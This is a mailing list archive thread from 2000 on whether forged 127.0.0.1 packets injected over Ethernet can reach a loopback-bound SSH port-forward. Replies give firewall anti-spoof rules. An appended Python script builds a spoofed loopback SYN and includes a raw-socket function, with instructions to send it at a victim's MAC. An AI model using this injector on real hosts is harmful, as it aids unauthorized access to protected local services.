Penetration Testing mailing list archives
Re: [PEN-TEST] Breaking SSH Listening Ports
From: "Dunker, Noah" <NDunker () FISHNETSECURITY COM>
Date: Thu, 14 Sep 2000 15:02:52 -0500
This method of spoofing was actually pretty common a while back... YES, on most OSes, you can inject loopback traffic on a PPP or ethernet interface, and YES, it will usually read the traffic. This is going to be a blind spoof, and nothing will get sent back to you.

If you have something bound to listen only on 127.0.0.1, it may prevent this from working, depending on how it's using the interface. If it's actually using the interface, not the IP address, the traffic might not get to the listening application. If it is listening only for something going to that address, then it will see the traffic no matter what.

This is why I do some fun firewalling rules with IPCHAINS and IPFilter on my unix-ish machines: both of these methods use kernel-level packet filters to accept the localhost subnet ONLY over the genuine loopback interface.

(FreeBSD)

    # rule 1: 127/8 packets arriving on the real loopback interface are fine
    ipfw add 1 pass ip from 127.0.0.0/8 to any in via lo0
    # rule 2: any other inbound packet with a 127/8 source is dropped
    # ("in" judges only the input pass, so the outbound leg of real loopback
    # traffic, which never matches "in via lo0", is not caught as well)
    ipfw add 2 deny ip from 127.0.0.0/8 to any in

or Linux 2.2.x, IPChains:

    # reject packets for the 127/8 net that arrive on any interface other than lo
    # (-p tcp limits this rule to TCP as written)
    ipchains -A input -p tcp -s 0/0 -d 127.0.0.0/8 -i ! lo -j REJECT

I don't have extensive experience with the Windows (9x/NT) TCP/IP stack, so I don't know what tools out there can do something similar, or if they exist.

--Noah Dunker

-----Original Message-----
From: MARC A KURTZ [mailto:marck () ESU EDU]
Sent: Thursday, September 14, 2000 2:03 PM
To: PEN-TEST () SECURITYFOCUS COM
Subject: Breaking SSH Listening Ports

(I hope this isn't off-topic)

We are looking into ways to break a solution we have that uses SSH to forward local ports on a Windows box. It uses the option to only bind to 127.0.0.1.

My question is, is a hacker able to "break" into the computer and send data to that loopback address and get the response? Is the loopback completely non-physical? In other words, if a hacker injected 127.0.0.1 packets into the ethernet card somehow, would the card ignore them, or pass them to the IP stack? Will the hacker be able to get the response if it gave one?

We are also assuming there is no PcAnywhere or similar software installed to take control of the mouse, keyboard and screen.

Thanks for any insight anyone can give me!

Thank you,
Marc Kurtz
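Added example (not code from either message in the thread): it builds the kind of packet Marc asks about, an IPv4/TCP SYN addressed to 127.0.0.1 as an attacker would inject it on the Ethernet segment, and then runs it through a small model of the filter Noah describes, which admits 127/8 addresses only when the packet arrives on the genuine loopback interface. The filter model combines both posted rules (the ipfw rule keys on the source address, the ipchains rule on the destination) and, like them, judges only inbound packets. Interface names, port 22, the MAC addresses and the sample packets are assumptions of the example; the injection helper is Linux-only and needs CAP_NET_RAW, and nothing ever comes back to the sender, which is the "blind spoof" Noah mentions.

```python
"""Forge a 127.0.0.1-addressed TCP SYN and model the anti-spoof filter from the
thread.  Added illustration; not code from the thread or from any firewall."""
import ipaddress
import socket
import struct

LOOPBACK_NET = ipaddress.ip_network("127.0.0.0/8")
LOOPBACK_IFACES = {"lo", "lo0"}        # Linux and BSD names for the real loopback


def checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_tcp_syn(src: str, dst: str, sport: int, dport: int, ident: int = 0x1234) -> bytes:
    """Return a 40-byte IPv4 datagram carrying a bare TCP SYN (no options)."""
    offset_flags = (5 << 12) | 0x02                    # data offset 5 words, SYN set
    tcp = struct.pack("!HHIIHHHH", sport, dport, 0, 0, offset_flags, 8192, 0, 0)
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src), socket.inet_aton(dst),
                         0, socket.IPPROTO_TCP, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), ident, 0, 64,
                     socket.IPPROTO_TCP, 0, socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def parse_ipv4(pkt: bytes) -> dict:
    """Decode the fields the filter needs and verify both checksums."""
    fields = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (fields[0] & 0x0F) * 4
    src, dst, proto = socket.inet_ntoa(fields[8]), socket.inet_ntoa(fields[9]), fields[6]
    segment = pkt[ihl:fields[2]]
    pseudo = struct.pack("!4s4sBBH", fields[8], fields[9], 0, proto, len(segment))
    return {
        "src": src, "dst": dst, "proto": proto,
        "ip_ok": checksum(pkt[:ihl]) == 0,             # valid header sums to zero
        "tcp_ok": proto == socket.IPPROTO_TCP and checksum(pseudo + segment) == 0,
    }


def filter_verdict(pkt: bytes, iface: str, direction: str = "in") -> str:
    """Decision of the posted rules on one packet.

    The ipfw rule matches a 127/8 *source*, the ipchains rule a 127/8
    *destination*; this model checks both, and like the rules it only judges
    packets on the inbound pass.
    """
    hdr = parse_ipv4(pkt)
    if not hdr["ip_ok"]:
        return "deny"                                  # the stack would discard it anyway
    src, dst = ipaddress.ip_address(hdr["src"]), ipaddress.ip_address(hdr["dst"])
    touches_loopback = src in LOOPBACK_NET or dst in LOOPBACK_NET
    if direction == "in" and touches_loopback and iface not in LOOPBACK_IFACES:
        return "deny"                                  # 127/8 only over the real loopback
    return "pass"


def inject_on_ethernet(pkt: bytes, iface: str, dst_mac: bytes, src_mac: bytes) -> int:
    """Linux-only: hand the datagram straight to the NIC (needs CAP_NET_RAW).

    The kernel's own routing would send a 127.0.0.1 packet over lo, so the
    spoofer wraps it in an Ethernet frame and pushes it out the wire interface
    itself.  Nothing is ever returned to the sender.
    """
    frame = dst_mac + src_mac + struct.pack("!H", 0x0800) + pkt   # EtherType IPv4
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0800)) as s:
        s.bind((iface, 0))
        return s.send(frame)


if __name__ == "__main__":
    # Constructed sample: forged SYN to a listener bound to 127.0.0.1:22.
    spoofed = build_tcp_syn("127.0.0.1", "127.0.0.1", 40000, 22)
    print(filter_verdict(spoofed, "eth0"), filter_verdict(spoofed, "lo"))   # deny pass
```

Run as a script it prints the verdict for the same forged packet seen on eth0 and on lo; to actually put the frame on the wire, call inject_on_ethernet with the victim's MAC as root. Note that the filter in the reply matches on addresses only, so the TCP checksum check here is just what the target stack will do before the packet ever reaches a listener.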
Current thread:
- [PEN-TEST] Breaking SSH Listening Ports MARC A KURTZ (Sep 14)
- Re: [PEN-TEST] Breaking SSH Listening Ports Jose Nazario (Sep 14)
- Re: [PEN-TEST] Breaking SSH Listening Ports Crist Clark (Sep 14)
- <Possible follow-ups>
- Re: [PEN-TEST] Breaking SSH Listening Ports Dunker, Noah (Sep 14)
- Re: [PEN-TEST] Breaking SSH Listening Ports Dunker, Noah (Sep 14)